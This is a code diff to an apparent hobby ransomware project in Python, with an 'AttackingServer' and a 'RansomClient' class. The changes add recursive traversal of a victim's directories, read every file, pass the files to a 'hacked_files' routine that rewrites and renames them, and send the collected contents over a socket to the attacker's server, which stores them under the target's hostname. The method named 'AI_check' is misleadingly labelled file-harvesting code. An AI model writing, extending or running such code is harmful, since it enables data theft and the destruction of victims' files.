@@ -16,7 +16,9 @@ class AttackingServer:
             lit_msg = client_sock.recv(8192).decode()
             if len(lit_msg) <= 0: break
             data += lit_msg
-        print(test)
+        byte = 8192 * test
+        print(f"{byte:_} Bytes has been sent to the server")
+        print(f'"_" stands for point')
         return data
 
     def start(self):
@@ -39,16 +41,22 @@ class AttackingServer:
             #This is the hostname of the target and it's being used for the directory name
             os.chdir(f"{alle_dateien['hostname']}")
 
+            file_count = 0
+            #Counts the files starts with "0"
             for datei, inhalt in alle_dateien.items():
+                # This stores all the files in that directory
                 if datei == "hostname": continue
                 if datei.endswith(".txt"):
+                    file_count += 1
                     with open(datei, "a+") as file:
                         file.write(str(inhalt))
 
                 else:
                     with open(datei, "ab") as file:
                         file.write(inhalt)
-            #This stores all the files in that directory
+
+            print(f"{file_count} files have been saved to your directory")
+            #Shows how much files there have been sent
 
 
 class RansomClient:
@@ -105,6 +113,26 @@ class RansomClient:
                 the_file.write(text)
                 # The files will be renamed
 
+    def AI_check(self,directory):
+        #This looks into every directory on the system
+        os.chdir(directory)
+        list_dir = os.listdir()
+        # This gets into the folder and looks for files
+        print("\n",list_dir, "\n")
+        lst = []
+        for each_name in list_dir:
+            if os.path.isfile(each_name):
+                lst.append(each_name)
+                print(f"\n{each_name}\n")
+                if each_name.endswith(".txt"):
+                    self.all_data(each_name, "r+")
+                    # Same process
+
+                self.all_data(each_name, "rb")
+
+                self.hacked_files(lst)
+        os.chdir("..")
+
     def all_data(self, filename, rwx):
         if rwx == "r+":
             with open(filename, "r+") as file:
@@ -150,7 +178,7 @@ class RansomClient:
         self.hacked_files(dateien)
         file_name_of_dir = []
         directory_in_list = []
-        print(directorys)
+        all_exist = []
         if directorys:
             for name in directorys:
                 print(name)
@@ -159,7 +187,11 @@ class RansomClient:
                 #This gets into the folder and looks for files
                 print(list_dir)
                 for each_name in list_dir:
+                    if each_name in all_exist:
+                        pass
+
                     if os.path.isfile(each_name):
+                        all_exist.append(each_name)
                         file_name_of_dir.append(each_name)
                         print(f"\n{each_name}\n")
                         if each_name.endswith(".txt"):
@@ -168,11 +200,10 @@ class RansomClient:
 
                         self.all_data(each_name, "rb")
                     if os.path.isdir(each_name):
-                        directory_in_list.append(each_name)
-
+                        self.AI_check(each_name)
 
                     #The function will kill some lines of code. I hope you like it
-                self.hacked_files(list_dir)
-                os.chdir(self.path)
+                self.hacked_files(all_exist)
+                os.chdir("..")
             print(directory_in_list)
         client.send(str(self.alle_dateien).encode())
\ No newline at end of file
